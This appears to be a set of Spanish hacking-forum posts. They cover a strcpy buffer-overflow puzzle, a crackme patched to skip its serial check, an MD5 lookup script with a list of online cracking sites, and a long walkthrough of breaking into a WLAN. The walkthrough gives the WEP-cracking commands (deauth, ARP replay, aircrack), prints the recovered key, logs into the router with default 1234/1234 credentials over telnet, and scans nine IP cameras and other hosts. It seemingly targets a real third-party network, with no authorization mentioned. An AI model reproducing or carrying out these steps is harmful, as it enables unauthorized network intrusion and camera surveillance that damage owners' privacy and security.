Veamos si sabéis que es esto:

#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
  char buffer[10];
  if (argc < 2)
  {
    fprintf(stderr, "MODO DE USO: %s string\n", argv[0]);
    return 1;
  }
  strcpy(buffer, argv[1]);
  return 0;
}

y si deseas puedes decir como lo resolverías si no. se publicara mañana la respuesta

Hola a todos, este  post va a tratar sobre Crackeo básico de un programa, lo que definimos como ingeniería inversa, se que este tema está más que trillado, pero creo que todo lo que sea distintos puntos de vista son buenos, Bien comenzemos.

Lo que vamos a crackear en este post es una crackme, el cual para todo aquel que desee practicar pueda hacerlo siguiendo los mismos pasos, aquí  podeis bajaros el crackme:

https://skydrive.live.com/#cid=1A68731A91386F4B&id=1A68731A91386F4B!114

Bien,  para hacer este tipo de crackeo hay varios tipos de programas, como por ejemplo:  OLLYDBG, W32DSM, INMMUNITY DEBUGGER, yo particularmente voy a hacerlo con el último, ya que el que más me gusta, pero debeis de saber que en el caso de OLLYDBG, el proceso es el mismo, bien, una vez ya tenemos nuestro programa para debuggear(desensamblar) y nuestro crackme (programa para crackear) comenzamos con  la operación.

-Lo 1º que haremos será abrir el programa que vamos a crackear  y una vez nos pide el serial para activarlo ponemos lo que queramos, en este caso yo he puesto 123456 y le damos a entrar o chequear, ver imagen:



-Una vez introducido el serial o la clave errónea, nos advertirá con una ventanita en la cual nos dará el mensaje de error diciéndonos que ese no es el serial, lo que hacemos será copiar el mensaje que esa ventanita nos dé, ver imagen:



Como podemos observar, el mensaje que este nos da es: key is wrong, bien una vez tenemos ya el mensaje copiado procederemos a abrir nuestro debuggeador y una vez abierto vamos a la pestaña file o archivo y seleccionamos abrir u open y seleccionamos el programa que vamos a  crackear, que en mi caso es el crackme, ver imágenes:






 Ahora nuestro debugger automáticamente nos abrirá  y desensamblara nuestro crackme o programa, bien una vez hecho esto, haremos click derecho y se nos abrirá una ventana, ahí haremos click sobre serach for y posteriormente sobre all referenced text strings,  con esto último se nos abrirán todas las referencias de las cadenas de texto que contiene nuestro programa o crackme, ver imagen:



Bien, una vez hecho esto, lo que hacemos es buscar en el debugger el mensaje de error que anteriormente nos dio el  crackme, que era key is wrong y una vez localizado hacemos un doble click sobre el, ver imagen:




Bien, una vez  hecho el doble click sobre el,  lo que hacemos será buscar el mensaje que nos de paso, el ok al programa y una vez localizado, que en este caso es key is ok lo que haremos será copiar el nº que figura a la izquierda del todo, ver imagen:
+


Una vez localizado el número lo que haremos será buscar el mesaje anterior de error y haremos un  doble click sobre la zona donde pone push seguido de crackme1 y un numero y automáticamente se nos abrirá una ventana en la que deberemos introducir lo siguiente:

JMP SHORT 0041660

Y pulsamos sobre la pestaña assemble, de este modo lo que estamos haciendo es crear un salto, desde el  mensaje de error(key  is worng) hasta el mensaje del ok (key is ok) para que lo entendamos, con la orden JMP SHORT lo que le estamos diciendo al programa es que cuando llegue al mensaje de error, salte directamente al ok, de esta forma creamos el salto, ver imagen:



Como podemos observar ya se ha creado el salto, así que cada vez que ejecutemos nuestro programa, se saltará la restricción ver imagen:



Hasta aquí todo bien, pero ahora para que este efecto quede permanente hay que proceder a guardarlo y para poder guardar los cambios haremos click derecho y se nos abrirá una ventana, en ella seleccionamos donde pone copy to executable y posteriormente en donde pone selection, ver imagen:



Una vez hecho esto veremos como se nos cambia y se nos desorganiza todas las ventanas dentro del debugger,pues bien, esto es normal no os asusteis jajaja,  ahora lo que haremos será situarnos encima la primera ventana y haremos un click derecho  y seleccionaremos save file  y después solo nos queda decirle donde queremos que nos guarde el programa (aconsejado guardarlo en el mismo lugar donde estaba para que funcione ver imágenes:





Pues ahora solo queda probarlo, así que lo que haremos será abrir nuestro crackme o programa ya crackeado y una vez nos pida el serial o la clave, ponemos lo que nos dé la gana, que en mi caso es 123456 y le damos a entrar, podemos ver en la imagen que el crackem en este caso ya está crackeado, ver imagen:



Bien chic@s, pues esta es la base para crackear un programa, evidentemente, los hay mucho más complicado, pero con esta entrada solo pretendo iniciar el 1º de la serie en la que iremos avanzando poco a poco, próximamente también se irán poniendo retos basado en los post de ingeniería inversa que voy posteando para que practiquéis, repito esto es la base, espero que os haya gustado y hasta el proximo. Se despide Nightcode

HOla gente de foro hacker

mostraros como crackear una contraseña que esté en MD5. (Esto solo serà posible si la contraseña está en alguna de las bases de datos consultadas en este script)

Lo 1º será descargarnos el archivo, aquí teneis el enlace: http://www.mediafire.com/?25tv01mw46vgs23

Ahora procederemos a ejecutarlo desde el directorio donde lo tengamos guardado, en mi caso está en el escritorio.

Sería así: perl md5BTshell.pl 5d3d327c8ca6ac4118fda3b47b5c00aa  ver imagen:



Bien una vez hecho esto le damos a enter y el programa empezara a trabajar como
podemos observar en la siguiente imagen.



Como podemos ver ya la ha crackeado, también deciros que el codigo es libre, por lo que con un
poco de ingénio podemos ir añadiendo más crackeadores online, de esa forma habrá más posibilidades de descifrarla.

esta es la lista de crackeadores que hay en el codigo.pl

Código: [Seleccionar]
md5decrypter.com
md5.thekaine.de
nz.md5.crysm.n
tydal.nu
milw0rm.com
gdataonline.com
csthis.com
md5pass.info
md5.hashcracking.com
md5decryption.com
md5.xpzone.de
us.md5.crysm.net
hashreverse.com
neeao.com
hashchecker.com
plain-text.info
victorov.su
securitystats.com
md5crack.it-helpnet

espero les haya gustado Att: Nightcode

espero les guste Att Nightcode:

ENTRANDO EN LA RED

Sabemos que la red LAN que queremos atacar dispone de un router Wi-Fi con ESSID: WLAN_BE.
Este es el único dato que tenemos por ahora, por lo que centramos nuestro ataque en el AP de la red Wi-Fi con el objetivo de autentificarnos como clientes legítimos de la red.

Corremos Backtrack.

Comenzamos con un monitoreo general de las redes a nuestro alcance para localizar nuestro objetivo. Descubrimos que el AP está emitiendo en el canal 6 y que su dirección MAC es E0:90:53:4A:68:AA. Además averiguamos que la contraseña tiene una cifrado WEP.

airodump-ng wlan0

Monitoreamos el tráfico de la red para capturar IVs que nos permitan crackear la pass con aircrack-ng.

airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0

Hacemos un ataque de falsa autenticación y nos asociamos con el AP para poder inyectar tráfico.

aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0

Comenzamos a analizar paquetes buscando aquellos que contengan una petición de ARP para poder reinyectarlos. Al reinyectarlos provocamos que el AP tenga que emitir otro paquete ARP con un IV nuevo que capturamos con el airodump-ng. Este proceso es un bucle que se repite generando muchisimo tráfico.

aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0

Como no encontramos ningún paquete de ARP que reinyectar, lanzamos un ataque de desautenticación a un cliente legítimo para que al volver a autenticarse genere una petición de ARP que podamos capturar y reinyectar.

aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0

Crackeamos el password de la red mediante los IVs obtenidos que hemos guardado en el wlan_be.cap.

aircrack-ng wlan_be.cap

Ya tenemos el password de la red: XE091534A27BE
Nos conectamos a ella como si fuéramos uno más.

TANTEANDO EL TERRENO

Una vez que estamos dentro de la red, hacemos un "reconocimiento del terreno" para saber ante que nos encontramos. Para ello vamos a realizar un escaneo con el Nmap.

Primero ejecutamos el comando:

ifconfig

Esto nos sirve para saber que IP nos ha asignado el servidor DHCP, y así poder deducir en que rango de IPs nos estamos moviendo. Descubrimos que nuestra IP es 192.168.1.129 , por lo tanto sabemos que seguramente el servidor DHCP asigne las IPs dentro del rango 192.168.1.1-255.

Para confirmarlo y hacernos una idea general del mapa de la LAN realizamos un escaneo rápido con Nmap.

nmap -sP 192.168.1.1-255

La opción -sP le indica al Nmap que simplemente compruebe si los hosts estan up or down.

Resultado:

root@bt:~# nmap -sP 192.168.1.1-255

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST
Nmap scan report for 192.168.1.1
Host is up (0.011s latency).
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Nmap scan report for 192.168.1.10
Host is up (0.033s latency).
MAC Address: 00:1B:11:01:30:95 (D-Link)
Nmap scan report for 192.168.1.13
Host is up (0.0060s latency).
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Nmap scan report for 192.168.1.14
Host is up (0.071s latency).
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Nmap scan report for 192.168.1.15
Host is up (0.54s latency).
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Nmap scan report for 192.168.1.16
Host is up (0.17s latency).
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Nmap scan report for 192.168.1.17
Host is up (0.17s latency).
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Nmap scan report for 192.168.1.18
Host is up (0.092s latency).
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Nmap scan report for 192.168.1.19
Host is up (0.32s latency).
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Nmap scan report for 192.168.1.20
Host is up (0.53s latency).
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Nmap scan report for 192.168.1.33
Host is up (0.0037s latency).
MAC Address: 00:26:24:75:5B:6F (Thomson)
Nmap scan report for 192.168.1.34
Host is up (0.0032s latency).
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Nmap scan report for 192.168.1.36
Host is up (0.0079s latency).
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Nmap scan report for 192.168.1.38
Host is up (0.25s latency).
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Nmap scan report for 192.168.1.129
Host is up.
Nmap done: 255 IP addresses (15 hosts up) scanned in 14.13 seconds

Descubrimos que hay 15 máquinas conectadas mediante la WLAN y confirmamos nuestras sospechas de que el servidor DHCP asigna IPs en el rango 192.168.1.1-255 . Esto ya nos permite esbozar un mapa más o menos aproximado de la red.

La ip 192.168.1.1 corresponde seguramente al AP, osea al router, que parece ser un Xavii.
Vemos un rango de Ips 192.168.1.10-20 que corresponden a aparatos D-Link lo que es bastante llamativo.
Vemos otras IPs correspondientes a varios hosts.
Y por último vemos nuestra IP 192.168.1.129 que la descartamos del análisis.

Una vez que tenemos más o menos claro por donde nos movemos... vamos a ver que pasa con ese router.

EL ROUTER

En el escaneo anterior hemos visto que la IP del router era 192.168.1.1 .Esta vez vamos a realizar un escaneo más a fondo, buscando puerto abiertos, servicios, S.O... Para ello corremos el Nmap con los siguientes parámetros:

root@bt:~# nmap -sV -A 192.168.1.1

Nmap scan report for 192.168.1.1
Host is up (0.0065s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        Xavi 7768 WAP ftpd 1.00
23/tcp   open  telnet     Zoom X6 ADSL router telnetd
53/tcp   open  tcpwrapped
80/tcp   open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
2800/tcp open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
8008/tcp open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Device type: broadband router|WAP
Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded
OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932)
Network Distance: 1 hop
Service Info: Devices: WAP, broadband router

TRACEROUTE
HOP RTT     ADDRESS
1   6.45 ms 192.168.1.1

Vemos que entre otras cosas en el campo del ftp el nmap nos dice que se trata del modelo Xavii 7768. Esto es una aproximación y seguramente no sea totalmente cierto, pero nos sirve.
Buscamos la documentación del router Xavii 7768 en internet http://www.adslayuda.com/xavi7768-cambiar_clave_acceso.html y vemos que el usuario y el password por defecto del router son 1234 y 1234 respectivamente. Es muy probable que no los hayan cambiado así que por probar que no quede.

Efectivamente no lo han cambiado. Ui, parece que alguien se ha dejado la puerta abierta.



Comprobamos que como habíamos supuesto antes no se trata del modelo Xavii 7768, sino del 7968 plus.
Y de repente en la pestaña de redireccionamiento de puertos...



BANG! Acabamos de descubrir que eran todos esos aparatos D-Link. Tenemos 9 cámaras con sus correspondientes IPs. Esto empieza a ponerse interesante...
Además sabemos que alguien se conecta a ellas desde el exterior de la red, ya que no tendría sentido haber configurado un NAT si no vas a acceder desde fuera del router.

Personalmente ODIO las interfaces http de los routers, me parece todo una maraña de opciones y pestañas, así que vamos a conectarnos al router por telnet para tener una consola con todas las opciones ordenaditas en blanco sobre negro...

root@bt:~# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

                ,vvvdP9P???^   ,,,
              vvd###P^`^         vvvvv v
         vv#####?^                  ????####vv,
      vv####??     ,vvvdP???^  ,,,        ??##^
     v#####?    ,vvd##P?^        #?#v#vvv
   v#####?    v###P^    ,vvv,        '?#?,
  ######?   ####?^ ,vd#P?^     `???##
  #####?   v####  ,d##P^           ''
 ######   v####  ]###L                   _   _          _                  ___
 #####?   v####  ]##L                   /   / \  |\ |  |_  \/   /\   |\ |   |
 ######    ####  ]###L                  \_  \_/  | \|  |_  /\  /--\  | \|   |
 ?#####v   ####v  ]##h,            ,,
  ?#####    ?###h,  `9#hv,     ,vv###
    ######    #####L    ]###L        ,v#v'
    ?#####vv    ?9##hv,        ,,vvvv###'
       ?#####vv     `??9P\vv,   ^         vv##,
          ######                       #######L
            ??###hvv,          ,vvv#?##?????
                `????9hdhvv,

Login: 1234
Password: ****

Login successful

-->
802.1x           802.1x port based authentication
acl              snmp remote management
agent            Get a file from a remote host
ald              Configuration commands for ald
bridge           Configure layer 2 bridge
classifier       Packet classifier configuration commands
console          Console access
dhcpclient       DHCP client configuration commands
dhcpserver       DHCP server configuration commands
dnsclient        DNS client configuration commands
dnsrelay         DNS relay configuration
emux             Ethernet Switch Multiplex configuration commands
ethernet         Commands to configure ethernet transports
firewall         Firewall configuration commands
fullConeNat      Full Cone NAT configuration commands
help             Top level CLI help
igmp             igmp configuration commands
imdebug          Directly access the information model
ip               Configure IP router
lan             
logger           Log to a remote host using syslog
meter            Packet metering configuration command
nat              NAT configuration commands
port             Physical port configuration commands
pppoa            PPP over ATM configuration
pppoe            PPP over Ethernet Configuration
reboot           reboot modem
restore_defaults set all configuration to factory setting
rfc1483          Commands to configure RFC1483 transports
save_and_exit    SAVES changes closing telnet session
save_and_reboot  SAVES changes and reboots modem.
save_config      Save configuration
scheduler        Configuration commands for scheduler
security         Security configuration commands not specific to NAT or firewall
simpleconfig     SimpleConfig Configuration commands
sntpclient       Simple Network Time Protocol Client commands
stop             
system           System administration commands
transports       Transport configuration commands
upnp             UPnP configuration commands
user             User commands
wanacl           snmp remote management
webserver        Webserver configuration commands
wpa              Configure WPA (Wireless Protected Access)
zipb             Configure Dynamic ZIPB mode
-->
Vaya... parece que se pueden hacer un par de cosas...
Pasemos a las camaras!

CAMARAS

Cuando intentamos acceder a alguna de las camaras por el puerto designado en la tabla del NAT se abre una ventana como esta solicitandonos un user y una pass.



Al no introducirla correctamente nos redirige a la siguiente pagina:



El siguiente paso es realizar un escaneo completo de las cámaras con Nmap.

CAMARA 1 IP 192.168.1.12

Según parece esta camara está offline, esto puede deberse a muchos motivos, que se estropeara, que la quitaran por decisión propia... La descartamos.

CAMARA 2 IP 192.168.1.13

Starting Nmap 5.61TEST4

Nmap scan report for 192.168.1.13
Host is up (0.0076s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
554/tcp  open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1501/tcp open  sas-3?
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera

TRACEROUTE
HOP RTT     ADDRESS
1   7.56 ms 192.168.1.13

CAMARA 3 IP 192.168.1.14

root@bt:~# nmap -sV -A 192.168.1.14

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.14
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp  open  telnet  Openwall GNU/*/Linux telnetd
554/tcp open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux

TRACEROUTE
HOP RTT       ADDRESS
1   281.05 ms 192.168.1.14

CAMARA 4 IP 192.168.1.15

root@bt:~# nmap -sV -A 192.168.1.15

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.15
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE   VERSION
21/tcp   open  ftp       GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp   open  telnet    Openwall GNU/*/Linux telnetd
554/tcp  open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1503/tcp open  imtc-mcs?
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux

TRACEROUTE
HOP RTT       ADDRESS
1   113.45 ms 192.168.1.15

CAMARA 5 IP 192.168.1.16

Host is up (0.27s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.16:443/home.htm
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   271.54 ms 192.168.1.16

CAMARA 6 IP 192.168.1.17

root@bt:~# nmap -sV -A 192.168.1.17

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.17
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.17:443/home.htm
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   336.91 ms 192.168.1.17

CAMARA 7 IP 192.168.1.18

nmap -sV -A 192.168.1.18

Starting Nmap 5.61TEST4 ( http://nmap.org )
Nmap scan report for 192.168.1.18
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was returned.
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   338.75 ms 192.168.1.18

CAMARA 8 IP 192.168.1.19

root@bt:~# nmap -sV -A 192.168.1.19

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.19
Host is up (0.66s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.19:443/home.htm
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   655.43 ms 192.168.1.19

CAMARA 9 IP 192.168.1.20

root@bt:~# nmap -sV -A 192.168.1.20

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.20
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.20:443/home.htm
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   360.67 ms 192.168.1.20

Una vez escaneadas las camaras escaneamos el resto de IPs para hacernos una idea de que otros equipos hay en la WLAN.

192.168.1.33 IMPRESORA HP

root@bt:~# nmap -sV -A 192.168.1.33

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CEST
Nmap scan report for 192.168.1.33
Host is up (0.0045s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Virata-EmWeb 6.2.1
|_http-title: HP Photosmart Wireless B109n-z
139/tcp  open  tcpwrapped
445/tcp  open  netbios-ssn
6839/tcp open  tcpwrapped
7435/tcp open  tcpwrapped
8080/tcp open  http-proxy?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
9102/tcp open  jetdirect?
9110/tcp open  unknown
9220/tcp open  hp-gsg      HP Generic Scan Gateway 1.0
9290/tcp open  hp-gsg      IEEE 1284.4 scan peripheral gateway
9500/tcp open  ismserver?
MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)
Device type: printer
Running: HP embedded
OS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-series
Network Distance: 1 hop
Service Info: Device: printer

Host script results:
|_nbstat: NetBIOS name: HPF4CE46EE2CE2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT     ADDRESS
1   4.55 ms 192.168.1.33

192.168.1.34 PC

root@bt:~# nmap -sV -A 192.168.1.34

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.34
Host is up (0.0029s latency).
Not shown: 990 filtered ports
PORT     STATE  SERVICE      VERSION
21/tcp   open   tcpwrapped
139/tcp  open   netbios-ssn
427/tcp  closed svrloc
445/tcp  open   microsoft-ds Microsoft Windows XP microsoft-ds
700/tcp  open   tcpwrapped
1073/tcp open   tcpwrapped
2869/tcp open   http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
6000/tcp open   X11?
8000/tcp open   http-alt?
8001/tcp open   vcom-tunnel?
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (98%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP Professional SP2 (firewall enabled) (98%), Microsoft Windows Small Business Server 2003 (98%), Microsoft Windows XP SP2 (94%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP SP3 (93%), Microsoft Windows XP Embedded SP2 (92%), Microsoft Windows XP SP2 or SP3 (92%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (90%), Microsoft Windows Server 2003 SP1 or SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JACOBO, NetBIOS user: <unknown>, NetBIOS MAC: 00:10:dc:e4:ee:c0 (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: Jacobo
|   NetBIOS computer name: JACOBO
|   Workgroup: debo
|_  System time: 2012-06-21 21:22:21 UTC+1

TRACEROUTE
HOP RTT     ADDRESS
1   2.94 ms 192.168.1.34

192.168.1.36 IMPRESORA HP


root@bt:~# nmap -sV -A 192.168.1.36

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:43 CEST
Nmap scan report for 192.168.1.36
Host is up (0.033s latency).
Not shown: 985 closed ports
PORT     STATE SERVICE           VERSION
80/tcp   open  http?
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp  open  tcpwrapped
445/tcp  open  netbios-ssn
631/tcp  open  ipp?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
6839/tcp open  tcpwrapped
7435/tcp open  tcpwrapped
8080/tcp open  http-proxy?
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
9102/tcp open  jetdirect?
9110/tcp open  unknown
9111/tcp open  DragonIDSConsole?
9220/tcp open  hp-gsg            HP Generic Scan Gateway 1.0
9290/tcp open  hp-gsg            IEEE 1284.4 scan peripheral gateway
9500/tcp open  ismserver?
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Device type: printer|power-device
Running: HP embedded, HP VxWorks, MGE embedded
OS CPE: cpe:/o:hp:vxworks
OS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 5000 RT UPS
Network Distance: 1 hop
Service Info: Device: printer

Host script results:
|_nbstat: NetBIOS name: HP9C8E99334DF0, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT      ADDRESS
1   33.32 ms 192.168.1.36

192.168.1.38

Esta IP no tengo ni la más mínima idea de a que podría pertenecer xD si alguno de ustedes se imaginan de algo me avisais foro hacker xD

nmap -sV -A 192.168.1.38

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:55 CEST
Nmap scan report for 192.168.1.38
Host is up (0.49s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
2869/tcp closed icslap
2968/tcp open   enpp?
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ce
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   486.83 ms 192.168.1.38

Observamos que la MAC del host pertenece a Edimax Technology Co. http://www.edimax.es/es/index.php Basta una búsqueda en internet para averiguar que es una empresa que se dedica a la fabricación de dispositivos Wireless, entre ellos cámaras Wireless. Será otra cámara?

IP 192.168.1.10 ¿OTRO ROUTER?
.

nmap -sV -A 192.168.1.10

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.10
Host is up (0.0072s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
23/tcp  open  telnet     D-Link Access Point telnetd
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped
